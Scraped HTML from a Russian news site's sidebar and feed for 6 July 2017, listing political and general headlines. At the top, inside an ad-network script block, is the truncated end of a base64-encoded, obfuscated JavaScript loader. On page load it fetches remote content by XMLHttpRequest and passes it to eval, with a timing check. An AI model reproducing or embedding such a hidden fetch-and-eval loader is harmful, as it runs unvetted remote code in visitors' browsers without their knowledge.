I7dmFyIHE9Ilx4MjNceDMwIjt2YXIgaz0iXHgyMyI7cmV0dXJuIGwuam9pbihtKS5zcGxpdChpKS5qb2luKGopLnNwbGl0KGEpLmpvaW4oZCkuc3BsaXQocSkuam9pbihrKS5zcGxpdChqKX1mdW5jdGlvbiBiKCl7ZnVuY3Rpb24gaChnLGYpe2lmKCFjKXtiPSB0cnVlfTt2YXIgaj1bYVswXSxhWzFdLGFbMl1dLGk9YVszXSxlLGg9MDtnPSAxMDtmPSAxNjtlPSBnKyBNYXRoW2FbNV1dKE1hdGhbYVs0XV0oKSogKGYtIGcpKTtpZighYSl7Yj0gMX07Zm9yKHZhciBkPTA7ZDwgZTtkKyspe2krPSBqW2hdW01hdGhbYVs1XV0oTWF0aFthWzRdXSgpKiBqW2hdW2FbNl1dKV07aD0gKGgrIE1hdGhbYVs1XV0oTWF0aFthWzRdXSgpKiAxMDApKSUgM307cmV0dXJuIGl9dmFyIGQ9e307ZFthWzddXT0gW107ZFthWzhdXT0gZnVuY3Rpb24oYil7ZFthWzddXVthWzEwXV0oYlthWzldXSl9O2RvY3VtZW50W2FbMTJdXShhWzExXSxkW2FbOF1dLHRydWUpO2Z1bmN0aW9uIGcoYil7cmV0dXJuIGJbYVsxNV1dKGFbM10pW2FbMTRdXSgpW2FbMTNdXShhWzNdKX12YXIgZj1kb2N1bWVudFthWzE3XV0oYVsxNl0pO2ZbYVsxOV1dW2FbMThdXT0gYVsyMF07ZG9jdW1lbnRbYVsyMl1dW2FbMjFdXShmKTtkW2FbMjNdXT0gIG5ldyBmW2FbMjldXVthWzI4XV0oZyhhWzI0XSsgKChsb2NhdGlvblthWzI1XV09PSBhWzI2XSk/YVsyN106YVsyM10pKSk7aWYoIWMpe2M9IDF9O2RbYVsyM11dW2FbMzBdXT0gZnVuY3Rpb24oZCl7aWYoYz09IDEpe2IoZmFsc2UsYVsxOF0pO2I9IHRydWU7cmV0dXJufWVsc2Uge2lmKGRbYVszM11dW2FbMzRdXSgwLGRbYVszM11dW2FbMzJdXShhWzMxXSkpPT0gYVszNV0pe2UoZFthWzMzXV1bYVszNF1dKGRbYVszM11dW2FbMzJdXShhWzMxXSkrIDEsZFthWzMzXV1bYVs2XV0pKX19fTtmdW5jdGlvbiBpKCl7aWYoIWMpe2MoZmFsc2UsMCk7Yz0gZmFsc2U7cmV0dXJufTt2YXIgYj1kb2N1bWVudFthWzM3XV0oYVszNl0pO2Zvcih2YXIgZj0wO2Y8IGJbYVs2XV07ZisrKXtiW2ZdW2FbMzhdXT0gYVszOV19O3ZhciBlPVtkb2N1bWVudFthWzQwXV1dO2lmKGRvY3VtZW50W2FbNDJdXVthWzQxXV0pe2VbYVsxMF1dKGRvY3VtZW50W2FbNDJdXVthWzQxXV1bYVs0MF1dKX07aWYoIWEpe3JldHVybn07Zm9yKHZhciBmPTA7ZjwgZVthWzZdXTtmKyspe2Zvcih2YXIgZz0wO2c8IGVbZl1bYVs2XV07ZysrKXt2YXIgZD1lW2ZdW2ddO2RbYVs0M11dW2FbNDVdXVthWzQ0XV0oZFthWzQzXV0pfX19ZnVuY3Rpb24gZShiKXt2YXIgZT1oKCk7aWYoIWMpe2MoZmFsc2UsdHJ1ZSxudWxsKTtjPSBmYWxzZX07d2luZG93W2VdPSBkO2I9IGFbNDZdKyBiKyBhWzQ3XSsgZSsgYVs0OF07ZXZhbChiKX1pZihjPT0gMSl7Yj0gZmFsc2U7cmV0dXJufTtkW2FbMjNdXVthWzQ5XV09IGZ1bmN0aW9uKCl7ZFthWzIzXV1bYVs1MV1dKGcoYVs1MF0pKX07ZFthWzIzXV1bYVs1Ml1dPSBmdW5jdGlvbihkKXt2YXIgaD0gbmV3IGZbYVsyOV1dW2FbNTNdXSgpO2hbYVs1Nl1dKGFbNTRdLGcoYVs1NV0pLHRydWUpO2hbYVs1N11dPSBwZXJmb3JtYW5jZVthWzU4XV0oKTtoW2FbNTldXT0gZnVuY3Rpb24oKXtpZighYSl7YigpO3JldHVybn1lbHNlIHtpZihoW2FbNjBdXT09IDQpe2lmKGhbYVs2MV1dPT0gMjAwKXtlKGhbYVs2Ml1dKX1lbHNlIHtpZihjPT0gMSl7cmV0dXJufTtpZihoW2FbNjFdXT09IDApe2lmKGM9PSB0cnVlKXtjKCl9O2lmKChwZXJmb3JtYW5jZVthWzU4XV0oKS0gaFthWzU3XV0pPCA1MCl7aWYoIWEpe2IoMSwwKX1lbHNlIHtpKCl9fX19fX19O2lmKGI9PSAxKXtyZXR1cm59O2hbYVs1MV1dKG51bGwpfX0oYikoKX0pKCk=')));
   
    //
      var x=d.getElementsByTagName(s)[0];
      x.parentNode.insertBefore(o,x);
      })(document,"script");
      </script>
      <!-- RedTram End -->
</div>

      </div>
      
        
          
<div class="new-materials-for-rubric" style="display: none;">
  <div class="proscience-subject">Новое</div>
  <div class="square-flow">
    
  <div class="col3-special" id="square-article50918">
    
<a href="/article/2017/07/06/hundredwords/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/07/06/thumbs/800--600_1499346978.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Сенатор Виктор Озеров" title="Сенатор Виктор Озеров" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      Симон Жаворонков
    
  
</div>

    <h4>
      #100 СЛОВ. В Совете Федерации меняется ответственный за оборону
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news451705">
    
<a href="/news/2017/07/06/ratushinskaya/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/07/06/thumbs/ratush_1499356122.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Ирина Ратушинская" title="Ирина Ратушинская" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Умерла писательница и диссидент Ирина Ратушинская
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news451704">
    
<a href="/news/2017/07/06/euronews/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2015/05/22/thumbs/euro2_1499355755.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Участники второго полуфинала Евровидения 2015" title="Участники второго полуфинала Евровидения 2015" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Залог Украины за «Евровидение» заблокирован в Швейцарии по требованию Euronews 
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-article50919">
    
<a href="/article/2017/07/06/top6july/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/07/06/thumbs/600-450_QeHvnJF_1499353087.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Охрана у штаба А.Навального в Москве" title="Охрана у штаба А.Навального в Москве" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Топ новостей 6 июля
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news451703">
    
<a href="/news/2017/07/06/school/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/11/08/thumbs/210494_1000x666_347_1f1392631d9b0d3a137719c788667ad5_1499352416.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Министр образования Ольга Васильева" title="Министр образования Ольга Васильева" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Глава Минобрнауки РФ объявила о начале масштабной школьной реформы
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news451702">
    
<a href="/news/2017/07/06/pogoda/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/06/21/thumbs/800-600_wYCUls9_1499355461.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Последствия урагана в Москве 2017 г" title="Последствия урагана в Москве 2017 г" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Холодную погоду назвали причиной роста безработицы в России
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-article50916">
    
<a href="/article/2017/07/06/army/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/07/06/thumbs/600-450_h3zalYI_1499349930.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Прохождение призывной комиссии" title="Прохождение призывной комиссии" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      Илья Карпюк
    
  
</div>

    <h4>
      Дума позволит уклонистам работать чиновниками
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news451701">
    
<a href="/news/2017/07/06/foot/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/07/06/thumbs/600-450_rsmpP42_1499358360.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Турнир по киберфутболу" title="Турнир по киберфутболу" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Футбольные симуляторы получили статус официального вида спорта
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news451700">
    
<a href="/news/2017/07/06/moskalkova/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/03/30/thumbs/841418_1499348045.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Татьяна Москалькова" title="Татьяна Москалькова" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Москалькова заявила об отсутствии фактов преследования геев в Чечне
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news451698">
    
<a href="/news/2017/07/06/voice/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2013/06/18/thumbs/pic_1368691987_1499347274.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Логотип «Яндекс.Браузера»" title="Логотип «Яндекс.Браузера»" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      «Яндекс» начал разрабатывать «голосового помощника»
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news451697">
    
<a href="/news/2017/07/06/royzman/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2013/10/01/thumbs/royzman_1499352477.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Евгений Ройзман" title="Евгений Ройзман" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Ройзман назвал выборы свердловского губернатора «ролевыми играми»
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-article50915">
    
<a href="/article/2017/07/06/g20/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2017/07/06/thumbs/19667806_1434377943320604_585105564039847313_o_1499342000.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Ангела Меркель перед саммитом G20" title="Ангела Меркель перед саммитом G20" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      Анна  Сакоян
    
  
</div>

    <h4>
      Саммит G20: риск и неопределенность
    </h4>
  </div>
</a>

  </div>

  <div class="col3-special" id="square-news451696">
    
<a href="/news/2017/07/06/x1/">
  <div class="image ii190x142 image-gray-back">
    
      <img src="/media/photolib/2016/11/17/thumbs/000_1499344994.jpg.0x142_q85_crop_cropsize-190x142.jpg" alt="Удар ВКС РФ по позициям террористов в Сирии" title="Удар ВКС РФ по позициям террористов в Сирии" height="142"/>
    
  </div>
  <div class="article-special">
    <div class="story-info">
  
    
      
    
  
</div>

    <h4>
      Путин высоко оценил характеристики новейшей крылатой ракеты после удара в Сирии
    </h4>
  </div>
</a>

  </div>


  </div>
</div>

        
      
    </div>



<!--END #content-->

  
    
      
        
<div class="right-column ib-col">
  <div class="left-or-right-top-banner-slot"></div>
  <h4 class="subject">Главные новости</h4>

<div class="top-news">
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2016/11/08/thumbs/210494_1000x666_347_1f1392631d9b0d3a137719c788667ad5_1499352416.jpg.88x66_q85.jpg" alt="Министр образования Ольга Васильева" title="Министр образования Ольга Васильева" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/07/06/school/" class="hover">Глава Минобрнауки объявила о начале масштабной школьной реформы</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2016/11/17/thumbs/000_1499344994.jpg.88x66_q85.jpg" alt="Удар ВКС РФ по позициям террористов в Сирии" title="Удар ВКС РФ по позициям террористов в Сирии" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/07/06/x1/" class="hover">Путин высоко оценил надежность ракеты X-101</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2014/09/03/thumbs/59_1499340445.png.88x66_q85.jpg" alt="Президент России Владимир Путин" title="Президент России Владимир Путин" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/07/06/general/" class="hover">Путин уволил восемь генералов МВД и МЧС</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2013/09/09/thumbs/shtab-090913-4_1499331345.jpg.88x66_q85.jpg" alt="В штабе Навального" title="В штабе Навального" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/07/06/naval/" class="hover">Следователи пришли в московский штаб Навального</a>
      </div>
    </div>
  
    <div class="top-news-story top-news-story-last">
      
        
          <img src="/media/photolib/2013/11/05/thumbs/kasparov_1499335316.jpg.88x66_q85.jpg" alt="Гарри Каспаров" title="Гарри Каспаров" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/07/06/kasparov/" class="hover">Гарри Каспаров возобновит карьеру шахматиста</a>
      </div>
    </div>
  
</div>



  
<div class="archive-calendar"><a href="/news/">Архив новостей</a></div>
<script type="text/javascript">
  function mkday(y,m,d) { return parseInt((new Date(y,m-1,d)).getTime() / 86400000); }
  var politcal_dates = [mkday(2017,7,1),mkday(2017,7,2),mkday(2017,7,3),mkday(2017,7,4),mkday(2017,7,5),mkday(2017,7,6)].join(',');
  var calendar_type = "news";
</script>

<div id="politcal"></div>

<script charset="utf-8" src="/static/polit/js/politcal.js" type="text/javascript"></script>



  

  <div class="most-read">
  <h4 class="subject">Самое читаемое</h4>
  
<div class="top-news">
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2017/07/03/thumbs/1_IUPxSwn_1499078016.jpg.88x66_q85.jpg" alt="Сергей Кириенко" title="Сергей Кириенко" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/article/2017/07/03/election/" class="hover">Кириенко слился?</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2014/01/15/thumbs/ps_t50_1499093468.jpg.88x66_q85.jpg" alt="Т-50 (ПАК-ФА)" title="Т-50 (ПАК-ФА)" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/07/03/t50/" class="hover">Начались завершающие испытания истребителя пятого поколения Т-50</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2017/07/01/thumbs/north_1498910532.jpg.88x66_q85.jpg" alt="Ким Чен Ын" title="Ким Чен Ын" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/article/2017/07/01/korea_dialogue/" class="hover">Последнее корейское предупреждение</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2017/01/29/thumbs/both_1498737876.jpg.88x66_q85.jpg" alt="Владимир Путин и Дональд Трамп" title="Владимир Путин и Дональд Трамп" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/06/29/putin_g20/" class="hover">Кремль не согласовал встречу Путина и Трампа на G20</a>
      </div>
    </div>
  
    <div class="top-news-story top-news-story-last">
      
        
          <img src="/media/photolib/2015/06/02/thumbs/lavrov_1498673694.jpg.88x66_q85.jpg" alt="Сергей Лавров" title="Сергей Лавров" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/06/28/lavrov/" class="hover">Лавров пообещал США соразмерный ответ на атаки по Дамаску</a>
      </div>
    </div>
  
</div>

</div>


  
  <div class="front-right-slot"></div>

  

  
<div class="news-lenta">

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18:56</span>
            </span><a href="/news/2017/07/06/arest/" class="hover">Полиция задержала сбившую в Балашихе «пьяного» мальчика женщину</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18:32</span>
            </span><a href="/news/2017/07/06/ratushinskaya/" class="hover">Умерла писательница и диссидент Ирина Ратушинская</a>
        </div>
    
<div class="news-right-slot2"></div>
    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18:19</span>
            </span><a href="/news/2017/07/06/euronews/" class="hover">Залог Украины за «Евровидение» заблокирован в Швейцарии по требованию Euronews </a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">17:39</span>
            </span><a href="/news/2017/07/06/school/" class="hover">Глава Минобрнауки РФ объявила о начале масштабной школьной реформы</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">17:18</span>
            </span><a href="/news/2017/07/06/pogoda/" class="hover">Холодную погоду назвали причиной роста безработицы в России</a>
        </div>
    

    

<div class="zabveniya-block" style="margin: 15px 0;font-family: Arial, Helvetica, sans-serif;">
<h4 style="background-color: #007854; text-align: center; font-weight: bold; color: #FFF;">ЗАБВЕНИЯ.NET</h4>
<a href="/news/2017/07/06/shagal/">
  <div style="font-weight: bold;font-family: Arial, Helvetica, sans-serif;">Мемория. Марк Шагал</div>
  
    <img src="/media/photolib/2015/07/05/thumbs/shagal1_1499235938.jpg.0x195_q85_crop_cropsize-260x195_upscale.jpg" alt="Марк Захарович Шагал" title="Марк Захарович Шагал" width="240"/>
  
  <div style="font-family: Arial, Helvetica, sans-serif;">6 июля 1887 родился знаменитый художник Марк Шагал</div>
</a>
</div>


    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">16:58</span>
            </span><a href="/news/2017/07/06/foot/" class="hover">Футбольные симуляторы получили статус официального вида спорта</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">16:34</span>
            </span><a href="/news/2017/07/06/moskalkova/" class="hover">Москалькова заявила об отсутствии фактов преследования геев в Чечне</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">16:17</span>
            </span><a href="/news/2017/07/06/voice/" class="hover">«Яндекс» начал разрабатывать «голосового помощника»</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">15:57</span>
            </span><a href="/news/2017/07/06/royzman/" class="hover">Ройзман назвал выборы свердловского губернатора «ролевыми играми»</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">15:49</span>
            </span><a href="/news/2017/07/06/kndr2/" class="hover">ЕС и Япония призвали к ужесточению санкции против Северной Кореи</a>
        </div>
    

    
    <div class="news-right-slot10"></div>
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">15:43</span>
            </span><a href="/news/2017/07/06/x1/" class="hover">Путин высоко оценил характеристики новейшей крылатой ракеты после удара в Сирии</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">15:29</span>
            </span><a href="/news/2017/07/06/shimko/" class="hover">Отца «пьяного» мальчика из Балашихи признали потерпевшим по делу о халатности экспертов</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">15:06</span>
            </span><a href="/news/2017/07/06/yalta/" class="hover">Аксенов пообещал найти работу мэру Ялты «по складу характера» </a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">14:59</span>
            </span><a href="/news/2017/07/06/fabula/" class="hover">Генпрокуратура потребовала внести «РуФабулу» в реестр запрещенных сайтов</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">14:55</span>
            </span><a href="/news/2017/07/06/ps_thin_mice/" class="hover">Потеря обоняния способствует сохранению стройной фигуры</a>
        </div>
    

    
    
    <div class="news-right-slot"></div>
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">14:43</span>
            </span><a href="/news/2017/07/06/ozerov/" class="hover">Соавтор «пакета Яровой» сенатор Виктор Озеров уйдет из Совета Федерации</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">14:40</span>
            </span><a href="/news/2017/07/06/levada/" class="hover">Опрос зафиксировал резкий рост рейтинга «Единой России»</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">14:34</span>
            </span><a href="/news/2017/07/06/malobrodsky/" class="hover">Дело экс-директора «Гоголь-центра» Малобродского передано в СКР</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">14:27</span>
            </span><a href="/news/2017/07/06/general/" class="hover">Путин уволил восемь генералов МВД и МЧС</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">14:07</span>
            </span><a href="/news/2017/07/06/sbu/" class="hover">Задержанных российских пограничников обвинили в посягательстве на целостность Украины</a>
        </div>
    

    
    
    
    <div class="news-right-slot20"></div>
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:55</span>
            </span><a href="/news/2017/07/06/shtab/" class="hover">В МВД назвали причину обысков в московском штабе Навального</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:38</span>
            </span><a href="/news/2017/07/06/gosduma/" class="hover">Комитет ГД рекомендовал отклонить закон о запрете суррогатного материнства</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:26</span>
            </span><a href="/news/2017/07/06/trump/" class="hover">Трамп допустил возможность вмешательства России в выборы в США</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:07</span>
            </span><a href="/news/2017/07/06/fifa/" class="hover">Россия поднялась на 62 место в рейтинге ФИФА</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:57</span>
            </span><a href="/news/2017/07/06/kasparov/" class="hover">Гарри Каспаров возобновит карьеру шахматиста</a>
        </div>
    

    
    
    
    
    <div class="news-right-slot25"></div>
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:48</span>
            </span><a href="/news/2017/07/06/box/" class="hover">Комитет Госдумы рекомендовал отклонить законопроект Мизулиной о запрете бэби-боксов</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:30</span>
            </span><a href="/news/2017/07/06/ps_personalized_cancer_vaccines/" class="hover">Первые испытания персонализированных вакцин против меланомы прошли успешно</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:23</span>
            </span><a href="/news/2017/07/06/pogrom/" class="hover">Роскомнадзор заблокировал «Спутник и погром» и «Правый взгляд»</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:06</span>
            </span><a href="/news/2017/07/06/boltay/" class="hover">Лидер хакерской группировки «Шалтай-Болтай» получил два года колонии</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:55</span>
            </span><a href="/news/2017/07/06/naval/" class="hover">Следователи пришли в московский штаб Навального</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
<script type="text/javascript"><!--
google_ad_client = "ca-pub-1191230850516122";
/* adxguru\polit.ru\240x400\0 */
google_ad_slot = "2380101327";
google_ad_width = 240;
google_ad_height = 400;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>

    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:51</span>
            </span><a href="/news/2017/07/06/yanukovich/" class="hover">Янукович отозвал своих адвокатов из судебного процесса по делу о госизмене</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:41</span>
            </span><a href="/news/2017/07/06/campus/" class="hover">На Летнем кампусе РАНХиГС выступят Ермолай Солженицын, Игорь Носов и Александр Ивлев</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:39</span>
            </span><a href="/news/2017/07/06/patriot/" class="hover">Пентагон поставит Польше комплексы ПВО систем Patriot</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:19</span>
            </span><a href="/news/2017/07/06/aksenov/" class="hover">Аксенов анонсировал отставку трех крымских министров и мэра Ялты</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:51</span>
            </span><a href="/news/2017/07/06/ps_eso_m77/" class="hover">Очень Большой Телескоп сфотографировал галактику М77</a>
        </div>
    

    
    
    
    
    
    
    <div class="news-right-slot35"></div>

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:49</span>
            </span><a href="/news/2017/07/06/sputnik/" class="hover">Генпрокуратура потребовала заблокировать «Спутник и погром» и «Правый взгляд»</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:38</span>
            </span><a href="/news/2017/07/06/kortej/" class="hover">Путин протестировал первый российский VIP-лимузин</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:28</span>
            </span><a href="/news/2017/07/06/dushko/" class="hover">В СКР сообщили о раскрытии убийства главы Сергиева Посада</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:11</span>
            </span><a href="/news/2017/07/06/martyshev/" class="hover">Российское посольство назвало похищением экстрадицию россиянина из Латвии в США</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:59</span>
            </span><a href="/news/2017/07/06/army/" class="hover">В России изменен порядок прохождения альтернативной службы‍</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:56</span>
            </span><a href="/news/2017/07/06/yanuk/" class="hover">Янукович высказался за возвращение Крыма в состав Украины</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:39</span>
            </span><a href="/news/2017/07/06/usa/" class="hover">Тиллерсон назвал главные темы переговоров Путина и Трампа</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:27</span>
            </span><a href="/news/2017/07/06/siemens/" class="hover">СМИ узнали о поставке в Крым немецких газовых турбин в обход санкций</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:12</span>
            </span><a href="/news/2017/07/06/kndr/" class="hover">Постпред США при ООН заявила о готовности применить военную силу против КНДР</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">05.07 21:02</span>
            </span><a href="/news/2017/07/05/valley/" class="hover">Научно-технологическую долину МГУ переименовали из-за особенностей рельефа</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">05.07 20:45</span>
            </span><a href="/news/2017/07/05/pension/" class="hover">В Северной Осетии «мертвым душам» выплатили пенсий на 350 млн рублей</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">05.07 20:23</span>
            </span><a href="/news/2017/07/05/qatar3/" class="hover">Соседи Катара продолжат его блокаду за отказ выполнять ультиматум</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">05.07 20:07</span>
            </span><a href="/news/2017/07/05/duma/" class="hover">В отсутствие Володина депутаты вновь стали голосовать друг за друга</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">05.07 19:52</span>
            </span><a href="/news/2017/07/05/kirilenko/" class="hover">СБУ потребуется месяц для поиска российских артистов в «черном списке»</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">05.07 19:15</span>
            </span><a href="/news/2017/07/05/weather/" class="hover">В конце недели Москву ждет осеннее похолодание</a>
        </div>
    

    
    
    
    
    
    
    

</div>


  
  
    


  

<div class="tags-cloud">

  

  

  

  

  

  
  <a href="/tag/apple/" class="weight8">Apple</a>
  

  

  

  

  

  

  

  
  <a href="/tag/boeing/" class="weight8">Boeing</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/facebook/" class="weight7">Facebook</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/google/" class="weight7">Google</a>
  

  
